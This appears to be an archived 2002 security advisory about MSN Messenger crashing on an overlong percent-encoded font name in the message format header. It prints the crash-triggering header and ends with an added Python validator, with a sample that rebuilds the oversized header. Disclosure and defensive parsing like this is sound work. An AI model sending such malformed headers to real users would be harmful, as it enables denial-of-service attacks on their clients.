Introduction to the flaw

MSN Messenger is a popular instant-messaging client from Microsoft. After the previous flaws regarding user privacy, another flaw has been discovered. This one makes the MSN Messenger client crash after it receives a malformed font variable in the header that accompanies an instant message.

How does it work exactly?

The MSN Messenger client sends a header with every message. Each time a user sends a message, the client generates a header containing information about the font, the colour of the message and some other details.

The flaw

A normal header looks something like this:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22

hey friend, how are you?
<end>

When the font field (FN) is replaced with something very large, creating an overflow, the header looks like this:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; PF=22

hey friend, how are you?
<end>

As a result the MSN Messenger client crashes. Only Microsoft's MSN Messenger client is affected; Trillian is not. This flaw is a severe danger, as it is not hard for attackers to build such a header into their own application and send it to any contact. Microsoft has been informed of this issue.
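As an added example (not code from the advisory or from Microsoft), the following Python parser handles the per-message header shown above the way a receiving client should: it splits the header block from the body, decodes the percent-encoded FN value and rejects a font name longer than a fixed bound before anything downstream sees it. The two sample messages are constructed from the headers in the advisory. The bound of 32 characters is an assumption (it matches LF_FACESIZE, the face-name limit of a Windows GDI LOGFONT; the advisory gives no number), as are the accepted EF flags and the numeric treatment of CO, CS and PF, since the text shows only one header. The check worth noting is that the length is enforced after decoding: each %20 collapses to a single byte, so the raw header length says nothing useful about what lands in a font-name buffer.

```python
"""Parser for the MSN Messenger per-message header from the advisory.

Added example, not code from the advisory or from Microsoft. Sample
messages below are constructed from the two headers in the text.
"""
import re
from urllib.parse import unquote

# Constructed sample: the normal header from the advisory, CRLF line endings assumed.
NORMAL_MESSAGE = (
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain; charset=UTF-8\r\n"
    "X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22\r\n"
    "\r\n"
    "hey friend, how are you?"
)

# Constructed sample: the oversized font name from the advisory, with the
# long runs of %20 generated rather than copied character for character.
OVERSIZED_MESSAGE = (
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain; charset=UTF-8\r\n"
    "X-MMS-IM-Format: FN=Times" + "%20" * 60 + "New" + "%20" * 22
    + "Roman" + "%20" * 11 + "; EF=B; CO=ff; CS=0; PF=22\r\n"
    "\r\n"
    "hey friend, how are you?"
)

# Assumed bound on a decoded font name. 32 matches LF_FACESIZE, the face-name
# limit of a Windows GDI LOGFONT; the advisory itself gives no number.
MAX_FONT_NAME = 32

FORMAT_KEYS = {"FN", "EF", "CO", "CS", "PF"}


class MalformedMessage(ValueError):
    """Raised for anything the receiver should drop instead of rendering."""


def split_message(raw: str):
    """Return (headers, body); the header block ends at the first blank line."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        raise MalformedMessage("no blank line terminating the header block")
    headers = {}
    for line in head.split("\r\n"):
        name, colon, value = line.partition(":")
        if not colon or not name.strip():
            raise MalformedMessage(f"bad header line: {line!r}")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def parse_im_format(value: str, max_font_name: int = MAX_FONT_NAME) -> dict:
    """Parse 'FN=...; EF=B; CO=ff; CS=0; PF=22', rejecting oversized or odd fields."""
    fmt = {}
    for item in value.split(";"):
        item = item.strip()
        if not item:
            continue
        key, eq, raw = item.partition("=")
        key = key.strip().upper()
        if not eq or key not in FORMAT_KEYS:
            raise MalformedMessage(f"unknown or malformed field: {item!r}")
        if key == "FN":
            # Check the length after decoding: each %20 becomes one byte, so the
            # raw header length says nothing about what reaches a font-name buffer.
            decoded = unquote(raw)
            if not decoded or len(decoded) > max_font_name:
                raise MalformedMessage(f"font name length {len(decoded)} outside 1..{max_font_name}")
            fmt[key] = decoded
        elif key == "EF":
            # Assumed effect flags: bold, italic, underline, strikethrough.
            if not re.fullmatch(r"[BIUS]*", raw):
                raise MalformedMessage(f"bad effect flags: {raw!r}")
            fmt[key] = raw
        elif key == "CO":
            # Colour as hex, at most 24 bits (assumed).
            if not re.fullmatch(r"[0-9A-Fa-f]{1,6}", raw):
                raise MalformedMessage(f"bad colour: {raw!r}")
            fmt[key] = int(raw, 16)
        else:
            # CS (charset) and PF (pitch/family): small non-negative integers assumed.
            if not re.fullmatch(r"[0-9]{1,3}", raw):
                raise MalformedMessage(f"bad numeric field {key}: {raw!r}")
            fmt[key] = int(raw)
    return fmt


def parse_message(raw: str) -> dict:
    """Validate a whole message and return its parsed format block and body."""
    headers, body = split_message(raw)
    return {"format": parse_im_format(headers.get("x-mms-im-format", "")), "body": body}


def accepts(raw: str) -> bool:
    """True if the message would be rendered, False if the receiver drops it."""
    try:
        parse_message(raw)
        return True
    except MalformedMessage:
        return False


if __name__ == "__main__":
    print(parse_message(NORMAL_MESSAGE))
    print("oversized header accepted:", accepts(OVERSIZED_MESSAGE))
```

Run as a script it prints the parsed normal message and then `False` for the oversized one. The same bound has to be applied wherever the decoded name is later copied into a fixed-size structure; validating at the parser only helps if nothing downstream re-reads the raw header.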
This archive was generated by hypermail 2b30 : Mon May 06 2002 - 12:04:31 PDT